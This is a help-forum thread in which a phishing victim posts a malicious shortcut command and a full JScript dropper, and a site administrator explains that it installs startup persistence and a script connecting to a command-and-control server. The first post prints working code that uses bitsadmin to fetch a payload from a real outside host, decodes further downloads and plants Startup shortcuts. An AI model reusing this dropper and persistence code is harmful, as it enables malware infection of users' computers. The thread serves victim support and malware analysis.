Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Please look at code I accidentally ran from email.


  • Please log in to reply
3 replies to this topic

#1 natastna2

natastna2

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:12:47 PM

Posted 01 February 2018 - 10:34 AM

Hello,
 
I received an email 20 minutes ago saying there was a problem on a website I run, it linked to an img download site. I downloaded the image, ran it and then noticed it was just named .jpg but was actually a shortcut. (Idiotic!).
 
The shortcut was:
 
C:\Windows\System32\cmd.exe /c mkdir c:\x1\ & cmd.exe /c attrib +h +s c:\x1 & cmd.exe /c "bitsadmin /transfer myjob /download /priority FOREGROUND www.dasc.ist/welcome.js c:\x1\1ax.js & start wscript.exe c:\x1\1ax.js"
 
and then contents of 1ax.js was:
 
sName = "win32";
var JpgName = "30012018";
var Server = "dasc.ist/file/file.php?file=
 
var YeniOlustur = WScript.CreateObject("WScript.Shell");
AppFolder = YeniOlustur.SpecialFolders("AppData");
InstallFolder = AppFolder+"\\Microsoft\\Windows\\Templates";
StartupFolder = YeniOlustur.SpecialFolders("Startup");
WindowsFolder = YeniOlustur.SpecialFolders("windir");
SystemFolder = WindowsFolder+"\\System32";
 
function Connect(islem,dosyadi)
{
try
{
var checkbeni = new ActiveXObject("MSXML2.XMLHTTP.3.0");
checkbeni["open"]("GET", Server+islem, false);
checkbeni.setRequestHeader("UserAgent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
checkbeni["send"]();
var Cevap = checkbeni["responsetext"];
 
    var xmlObj = WScript.CreateObject("MSXml2.DOMDocument");
    var docElement = xmlObj.createElement("Base64Data");
    docElement.dataType = "bin.base64";
    docElement.text = Cevap;
    var outputStream = WScript.CreateObject("ADODB.Stream");
    outputStream.Type = 1;
    outputStream.Open(); 
    outputStream.Write(docElement.nodeTypedValue);
    outputStream.SaveToFile(InstallFolder + "\\"+dosyadi, 2);
    outputStream.Close();
 
}
catch(AHA) {  WScript.sleep(1500); Connect(islem,dosyadi); }
}
 
function Install()
{
 
 
myObject = new ActiveXObject("Scripting.FileSystemObject");
 
 
if(!myObject.FileExists(InstallFolder + "\\"+JsName+".js")) {
Connect(JsName,JsName+".js"); 
Short(StartupFolder);
Short(InstallFolder);
YeniOlustur["run"](InstallFolder+"\\"+ScName+".lnk", 1);
}
 
if(!myObject.FileExists(InstallFolder + "\\"+JpgName+".jpg")) {
Connect(JpgName,JpgName+".jpg"); }
 
YeniOlustur["run"](InstallFolder+"\\"+JpgName+".jpg", 1);
 
 
}
 
function Short(adresv)
{ try{
var Kisayolcu = YeniOlustur.CreateShortcut(adresv + "\\"+ScName+".lnk");
var adresim = "wscript.exe";
Kisayolcu.TargetPath = adresim;
Kisayolcu.Arguments = InstallFolder+"\\"+JsName+".js";
Kisayolcu.WorkingDirectory = InstallFolder;
Kisayolcu.Save();
} catch(YOKYA){   WScript.sleep(1500);  Short(); } }
 
Install();
 
------------------------------------------
 
I would very much appreciate anyone who could tell me what this might have done. It was not picked up by my antivirus and I am running malwarebytes / tdss scans currently.
 
Thank you very much for any help / advice.
 
Regards,
Natastna2

BC AdBot (Login to Remove)

 


#2 Grinler

Grinler

    Lawrence Abrams


  • Admin
  • 43,593 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:01:47 PM

Posted 01 February 2018 - 04:02 PM

This script downloads some other javascript files and an image and sets it up like this:

%UserProfile%\AppData\Roaming\Microsoft\Windows\Recent\30012018.jpg.lnk
%UserProfile%\AppData\Roaming\Microsoft\Windows\Recent\Templates.lnk
%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
%UserProfile%\AppData\Roaming\Microsoft\Windows\Templates\30012018.jpg
%UserProfile%\AppData\Roaming\Microsoft\Windows\Templates\svchost.lnk
%UserProfile%\AppData\Roaming\Microsoft\Windows\Templates\win32.js

On login, svchost.lnk will launch win32.js, which connects to a Command & Control server that will send commands to execute.

#3 Grinler

Grinler

    Lawrence Abrams


  • Admin
  • 43,593 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:01:47 PM

Posted 01 February 2018 - 05:23 PM

Btw, could you submit the email to https://www.bleepingcomputer.com/submit-malware.php?channel=3

Would like to do a quick story on it to alert our visitors/

#4 natastna2

natastna2
  • Topic Starter

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:12:47 PM

Posted 02 February 2018 - 06:40 PM

Thank you very much for your help and time in responding to me. I really appreciate it.

 

I decided to just reformat to be on the safe side.

 

I'll submit that email now.

 

Kind regards,

natastna2






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users